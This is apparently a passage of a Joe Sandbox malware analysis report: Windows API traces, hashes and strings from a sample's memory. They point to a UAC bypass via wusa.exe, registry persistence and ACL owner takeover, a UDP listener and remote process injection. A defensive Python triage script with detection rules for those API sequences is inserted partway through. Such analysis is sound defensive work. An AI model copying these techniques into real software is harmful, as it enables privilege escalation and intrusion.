                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShelllstrlen
                                                                                        • String ID: $%systemroot%\system32\cmd.exe$<$@$D$PDGu$uac$useless$wusa.exe
                                                                                        • API String ID: 1628651668-3716895483
                                                                                        • Opcode ID: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                        • Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
                                                                                        • Opcode Fuzzy Hash: 2389670ef0d52bc0af3abcc9b5081f8297bcd674c671d6a9091d706800eac20c
                                                                                        • Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32 ref: 00401DC6
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 00401DE8
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00401E0A
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 00401E1B
                                                                                        • GetTickCount.KERNEL32 ref: 00401FC9
                                                                                          • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 00401C15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                        • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                        • API String ID: 4207808166-1381319158
                                                                                        • Opcode ID: 9f3abc139dc6c88613093014c78d45ea21c86ec42b9258ba851d748653af05de
                                                                                        • Instruction ID: 8f9aaa01d81d5e00f35a14cef107f65a3e8f5b831808d54868c05c9eb27f2f66
                                                                                        • Opcode Fuzzy Hash: 9f3abc139dc6c88613093014c78d45ea21c86ec42b9258ba851d748653af05de
                                                                                        • Instruction Fuzzy Hash: D451D9B05043446FD320AF768C85F67BAECEB84708F04493FF955A2292D7BDA94487A9
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,7591F380), ref: 00402A83
                                                                                        • HeapAlloc.KERNEL32(00000000,?,7591F380), ref: 00402A86
                                                                                        • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                        • htons.WS2_32(00000000), ref: 00402ADB
                                                                                        • select.WS2_32 ref: 00402B28
                                                                                        • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                        • htons.WS2_32(?), ref: 00402B71
                                                                                        • htons.WS2_32(?), ref: 00402B8C
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                        • String ID:
                                                                                        • API String ID: 1639031587-0
                                                                                        • Opcode ID: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                        • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                        • Opcode Fuzzy Hash: 0a9a318a9520cdba09dec5fbe0b7d43cc2391f431d6a7511ea18a0acbd49a9c0
                                                                                        • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                        • ExitProcess.KERNEL32 ref: 00404121
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateEventExitProcess
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 2404124870-2980165447
                                                                                        • Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                        • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                        • Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
                                                                                        • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
                                                                                        • LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
                                                                                        • GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
                                                                                        • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Read$AddressLibraryLoadProc
                                                                                        • String ID:
                                                                                        • API String ID: 2438460464-0
                                                                                        • Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                        • Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
                                                                                        • Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                        • Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
                                                                                        • FreeSid.ADVAPI32(?), ref: 00406F3E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID: *p@
                                                                                        • API String ID: 3429775523-2474123842
                                                                                        • Opcode ID: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                        • Instruction ID: a55d58a6849641b9de595c9770ce5785232f8714219103e6702645194e06a02f
                                                                                        • Opcode Fuzzy Hash: e5b07a668181befdfd7487022a30a26c3f8e9f7140bfa863a498fdcbf626812e
                                                                                        • Instruction Fuzzy Hash: 6701E571904209AFDB10DFE4ED85AAE7BB8F708304F50847AE606E2191D7745A54CB18
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 026165F6
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02616610
                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 02616631
                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 02616652
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1965334864-0
                                                                                        • Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                        • Instruction ID: e6359c7c106158552dc72e23f537df794f8e037d0a8638377616cd0320c8a5bc
                                                                                        • Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                        • Instruction Fuzzy Hash: 5D117375600258BFDB219F65DC45F9B3FACEB057A5F144024FA08E7251D7B1ED40CAA4
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
                                                                                        • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 004063EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 1965334864-0
                                                                                        • Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                        • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                        • Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                        • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
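The API sequences listed above are the kind a triage script should flag on its own: SetFileSecurityA with OWNER_SECURITY_INFORMATION (1) followed by SetFileSecurityA with DACL_SECURITY_INFORMATION (4), socket(2, 2, 0x11) (AF_INET, SOCK_DGRAM, IPPROTO_UDP) followed by recv, AllocateAndInitializeSid with sub-authorities 0x20 and 0x220 followed by CheckTokenMembership, and VirtualAllocEx with protection 0x40 (PAGE_EXECUTE_READWRITE) followed by WriteProcessMemory. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses the report's "• Api.DLL(args), ref: addr" lines, groups them by the "APIs" headers, and applies four rules. The rule names, the argument positions (taken from the documented Win32 prototypes) and the embedded sample (lines copied from the trace above) are this example's own. One caveat the rule encodes as an assumption: the trace shows the SID's identifier authority as "?", so reading 0x20/0x220 as BUILTIN\Administrators (S-1-5-32-544) holds only if that authority is SECURITY_NT_AUTHORITY.

```python
"""Rule-based triage of '• Api.DLL(args), ref: addr' lines from a Joe Sandbox API trace."""
import re
from dataclasses import dataclass

# Windows SDK constants for the positional arguments the rules inspect.
OWNER_SECURITY_INFORMATION, DACL_SECURITY_INFORMATION = 0x1, 0x4
PAGE_EXECUTE_READWRITE = 0x40
AF_INET, SOCK_DGRAM, IPPROTO_UDP = 2, 2, 17
SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS = 0x20, 0x220   # *-32-544, assumed NT authority

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<dll>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")


@dataclass
class Call:
    api: str
    dll: str
    args: list   # 8-digit hex tokens become int; '?' and string literals stay as text
    ref: int     # call-site address


def parse_line(line):
    """Parse one trace line; return None for headers and other non-API lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args") or ""
    args = []
    for tok in (raw.split(",") if raw else []):
        tok = tok.strip()
        args.append(int(tok, 16) if HEX_RE.match(tok) else tok)
    return Call(m.group("api"), m.group("dll"), args, int(m.group("ref"), 16))


def parse_trace(text):
    """Split the text at its 'APIs' headers so each rule runs inside one function."""
    funcs, cur = [], []
    for line in text.splitlines():
        if line.strip() == "APIs":
            if cur:
                funcs.append(cur)
            cur = []
        elif (c := parse_line(line)) is not None:
            cur.append(c)
    return funcs + [cur] if cur else funcs


def arg(c, i):
    return c.args[i] if i < len(c.args) else None


def after(calls, i, api, pred=lambda c: True):
    """First call named `api` after index i that satisfies pred, else None."""
    return next((c for c in calls[i + 1:] if c.api == api and pred(c)), None)


def rule_acl_rewrite(calls):
    for i, c in enumerate(calls):
        if c.api == "SetFileSecurityA" and arg(c, 1) == OWNER_SECURITY_INFORMATION:
            d = after(calls, i, "SetFileSecurityA", lambda x: arg(x, 1) == DACL_SECURITY_INFORMATION)
            if d:
                return f"file owner set at {c.ref:08X}, DACL replaced at {d.ref:08X} (ACL tampering)"


def rule_udp_listener(calls):
    for i, c in enumerate(calls):
        if c.api == "socket" and c.args[:3] == [AF_INET, SOCK_DGRAM, IPPROTO_UDP]:
            r = after(calls, i, "recv")
            if r:
                return f"UDP socket at {c.ref:08X}, recv at {r.ref:08X} (datagram listener)"


def rule_admin_check(calls):
    for i, c in enumerate(calls):
        if (c.api == "AllocateAndInitializeSid" and arg(c, 1) == 2
                and c.args[2:4] == [SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS]):
            t = after(calls, i, "CheckTokenMembership")
            if t:
                return f"*-32-544 SID built at {c.ref:08X}, tested at {t.ref:08X} (is-admin check)"


def rule_injection(calls):
    for i, c in enumerate(calls):
        if c.api == "VirtualAllocEx" and arg(c, 4) == PAGE_EXECUTE_READWRITE:   # flProtect
            w = after(calls, i, "WriteProcessMemory")
            if w:
                return f"remote RWX memory at {c.ref:08X}, written at {w.ref:08X} (process injection)"


RULES = (rule_acl_rewrite, rule_udp_listener, rule_admin_check, rule_injection)


def triage(text):
    """Return one finding string per (function, rule) hit, in report order."""
    findings = []
    for calls in parse_trace(text):
        for rule in RULES:
            hit = rule(calls)
            if hit:
                findings.append(hit)
    return findings


# Sample input: lines copied from the report's trace, reduced to the calls the rules need.
SAMPLE = """\
APIs
• SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
• DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
• SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
• select.WS2_32 ref: 00402B28
• recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00406F0F
• CheckTokenMembership.ADVAPI32(00000000,?,*p@), ref: 00406F24
APIs
• VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 004063CA
• WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 004063EB
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Run against the full report text instead of SAMPLE and each function that matches a rule is reported once with its call-site addresses, which can be cross-referenced with the Opcode and Instruction IDs above; the per-function grouping is what keeps, for example, a VirtualAllocEx in one function from pairing with a WriteProcessMemory in another.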
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000100), ref: 00408E5F
                                                                                        • DeviceIoControl.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00408EAB
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EB4
                                                                                          • Part of subcall function 00408DF1: GetSystemTime.KERNEL32(?,004129F8,?,?,00408E8B,?), ref: 00408DFC
                                                                                          • Part of subcall function 00408DF1: SystemTimeToFileTime.KERNEL32(?,00408E8B,?,?,00408E8B,?), ref: 00408E0A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem$CloseControlCreateDeviceHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3754425949-0
                                                                                        • Opcode ID: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
                                                                                        • Instruction ID: 6158522553dbc768b3fa764069f531a078bfca64040c8912efb0c234455cb59d
                                                                                        • Opcode Fuzzy Hash: 2cf703b3f3d70fe1d21397a344fcfe55e6ffa78bdc2e74738428da1b6bf63eb9
                                                                                        • Instruction Fuzzy Hash: CD11C8726402047BEB115F95CD4EEDB3F6DEB85714F00452AF611B62C1DAB9985087A8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
                                                                                        • Instruction ID: 64893a5cec851924fefc00027ac9d8258265f32e823952a4835c6918c3f2ac29
                                                                                        • Opcode Fuzzy Hash: b87d996b03424d41ecd054f3042c71836826564e4b1ffe17874333ad5a991b34
                                                                                        • Instruction Fuzzy Hash: 59714BB4501B41CFD360CF66D548782BBE0BB54308F10CD6ED5AAAB790DBB86588DF98
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, Offset: 02669000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                        • Instruction ID: 996a4dd4d1d31b0d359995f160e8a309698b2c0960f6a23e9d15c78da0823b90
                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                        • Instruction Fuzzy Hash: DF11A572340100AFD754DF69ECC8FA673EAEB89320B198155ED04CB352D675EC42C761
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                        • Instruction ID: e7823351478a29d2a85874302e36bfb9e95c4145b25703ddd37f56d31d2d295e
                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                        • Instruction Fuzzy Hash: 5A01A276B106048FDF21CF24C805BAA33E9EB86216F4984A5DD0AD7385E774B9818B90
                                                                                        APIs
                                                                                        • ExitProcess.KERNEL32 ref: 02619E6D
                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 02619FE1
                                                                                        • lstrcat.KERNEL32(?,?), ref: 02619FF2
                                                                                        • lstrcat.KERNEL32(?,0041070C), ref: 0261A004
                                                                                        • GetFileAttributesExA.KERNEL32(?,?,?), ref: 0261A054
                                                                                        • DeleteFileA.KERNEL32(?), ref: 0261A09F
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 0261A0D6
                                                                                        • lstrcpy.KERNEL32 ref: 0261A12F
                                                                                        • lstrlen.KERNEL32(00000022), ref: 0261A13C
                                                                                        • GetTempPathA.KERNEL32(000001F4,?), ref: 02619F13
                                                                                          • Part of subcall function 02617029: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 02617081
                                                                                          • Part of subcall function 02616F30: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\kosqarwi,02617043), ref: 02616F4E
                                                                                          • Part of subcall function 02616F30: GetProcAddress.KERNEL32(00000000), ref: 02616F55
                                                                                          • Part of subcall function 02616F30: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02616F7B
                                                                                          • Part of subcall function 02616F30: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02616F92
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 0261A1A2
                                                                                        • RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0261A1C5
                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 0261A214
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 0261A21B
                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 0261A265
                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0261A29F
                                                                                        • lstrcat.KERNEL32(?,00410A34), ref: 0261A2C5
                                                                                        • lstrcat.KERNEL32(?,00000022), ref: 0261A2D9
                                                                                        • lstrcat.KERNEL32(?,00410A34), ref: 0261A2F4
                                                                                        • wsprintfA.USER32 ref: 0261A31D
                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0261A345
                                                                                        • lstrcat.KERNEL32(?,?), ref: 0261A364
                                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 0261A387
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 0261A398
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0261A1D1
                                                                                          • Part of subcall function 02619966: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 0261999D
                                                                                          • Part of subcall function 02619966: RegDeleteValueA.ADVAPI32(?,00000000), ref: 026199BD
                                                                                          • Part of subcall function 02619966: RegCloseKey.ADVAPI32(?), ref: 026199C6
                                                                                        • GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 0261A3DB
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 0261A3E2
                                                                                        • GetDriveTypeA.KERNEL32(00000022), ref: 0261A41D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
                                                                                        • String ID: "$"$"$D$P$\
                                                                                        • API String ID: 1653845638-2605685093
                                                                                        • Opcode ID: 2004a96a3fb695a35ebb74482f6fad10186942e4c1f31b0e0affa7522a4f957f
                                                                                        • Instruction ID: a428442591a48f7a5758b6520b6dd59f93fa78c3585de0315dd98221bc02c418
                                                                                        • Opcode Fuzzy Hash: 2004a96a3fb695a35ebb74482f6fad10186942e4c1f31b0e0affa7522a4f957f
                                                                                        • Instruction Fuzzy Hash: 8BF155B1C41259AFDF11DBA0CD48FEF77BDAB08304F0844AAE609E2151E775AA85CF64
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 02617D21
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 02617D46
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02617D7D
                                                                                        • RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 02617DA2
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02617DC0
                                                                                        • EqualSid.ADVAPI32(?,?), ref: 02617DD1
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 02617DE5
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02617DF3
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02617E03
                                                                                        • RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 02617E12
                                                                                        • LocalFree.KERNEL32(00000000), ref: 02617E19
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02617E35
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                        • String ID: D$PromptOnSecureDesktop
                                                                                        • API String ID: 2976863881-1403908072
                                                                                        • Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                        • Instruction ID: e7bbb1a8db83492ccd64379e8a5bb20af06a80e0ac608be8dd40a425ef388ccd
                                                                                        • Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                        • Instruction Fuzzy Hash: 38A16C71900259AFDF12CFA0DC88FEFBBB9FB08345F088169E505E6250D775AA85CB64
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,004133B0,?), ref: 00407B16
                                                                                        • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
                                                                                        • EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
                                                                                        • RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407BB2
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                        • String ID: D$PromptOnSecureDesktop
                                                                                        • API String ID: 2976863881-1403908072
                                                                                        • Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                        • Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
                                                                                        • Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                        • Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                        • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                        • API String ID: 2400214276-165278494
                                                                                        • Opcode ID: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
                                                                                        • Instruction ID: e6dd37f2d7c7e48b8b359c94d8b0a85da35b73f81cc1d7405eac3f4e783bc3bd
